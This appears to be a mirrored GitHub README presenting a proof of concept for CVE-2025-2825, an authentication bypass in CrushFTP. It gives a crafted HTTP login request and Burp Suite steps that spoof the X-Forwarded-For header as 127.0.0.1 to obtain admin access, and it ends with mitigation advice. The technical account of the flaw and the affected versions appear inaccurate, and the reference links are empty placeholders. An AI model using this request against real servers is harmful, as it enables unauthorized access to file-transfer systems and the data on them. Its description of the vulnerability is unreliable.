来源

关联漏洞

描述

Authentication Bypass PoC for CVE-2025-2825 – Exploiting CrushFTP 10.x

介绍

![CVE](https://img.shields.io/badge/CVE-2025--2825-red)
![Exploit-Status](https://img.shields.io/badge/status-exploitable-critical)

# 🚨 CVE-2025-2825 – CrushFTP Authentication Bypass

## 🔎 Overview

**CVE-2025-2825** is a critical authentication bypass vulnerability affecting **CrushFTP**, a widely used secure file transfer server. The flaw allows remote attackers to bypass login authentication and gain administrative access by spoofing headers — tricking the server into thinking the request came from localhost.

- **Severity:** Critical  
- **CVSS Score:** 9.8  
- **Attack Vector:** Remote  
- **Affected Versions:** CrushFTP < v10.6.0  
- **Fixed In:** v10.6.0 and above  
- **Status:** Under active exploitation in the wild  

---

## 🧠 Technical Details

The vulnerability arises due to improper validation of the `X-Forwarded-For` header. When this header is set to `127.0.0.1`, the server treats the request as local — bypassing authentication.

---

## 🧪 Proof of Concept (PoC)

### 🔸 HTTP Request Example:

```http
GET /WebInterface/login.html?command=validate&username=Admin&password=any HTTP/1.1  
Host: target-ip  
X-Forwarded-For: 127.0.0.1
```

> 📝 Replace `target-ip` with the actual IP address of the target CrushFTP server.

If successful, the server bypasses authentication and grants access — even with incorrect credentials.

---

## 🔗 PoC Python Script

[📄 cve-2025-2825-poc.py](./cve-2025-2825-poc.py)

---

## 🛠️ Tools & Technologies Used

- **Python** – scripting the exploit  
- **Burp Suite** – intercepting and modifying HTTP headers  
- **Wireshark** – packet capture and analysis  
- **Nmap** – port scanning and service enumeration  
- **CrushFTP** – vulnerable target instance  
- **GitHub** – for publishing PoC and documentation  

---

## 📝 Steps to Reproduce

1. Set up a vulnerable version of CrushFTP (v10.5 or earlier).
2. Intercept the login request using Burp Suite.
3. Modify the HTTP request header:
   ```
   X-Forwarded-For: 127.0.0.1
   ```
4. Forward the request.
5. Admin access is granted without valid credentials.

---

## ✅ Mitigation

- Upgrade to CrushFTP **v10.6.0** or higher.
- Sanitize and validate headers like `X-Forwarded-For`.
- Restrict admin access to localhost or behind a VPN/firewall.
- Monitor logs for suspicious access patterns.

---

## 👨‍💻 Author

**Shivshant Patil**  
Certified Ethical Hacker (CEH v13)  
B.Tech Computer Engineering Graduate  
🔗 [LinkedIn Profile](https://www.linkedin.com/in/shivshant-patil-b58aaa281)
🔗 [Github Profile](https://github.com/Shivshantp)

---

## 📚 References

- 🔗 [Official CrushFTP Security Advisory](#)
- 🔗 [NVD Entry - CVE-2025-2825](#)
- 🔗 [PacketStorm Security](#)

文件快照

 [4.0K]  /data/pocs/e7da2299f818a1ddc48bdbcd7c0f02cb29a8cd0b
├── [ 509]  cve-2025-2825-poc.py
└── [2.7K]  README.md

0 directories, 2 files

备注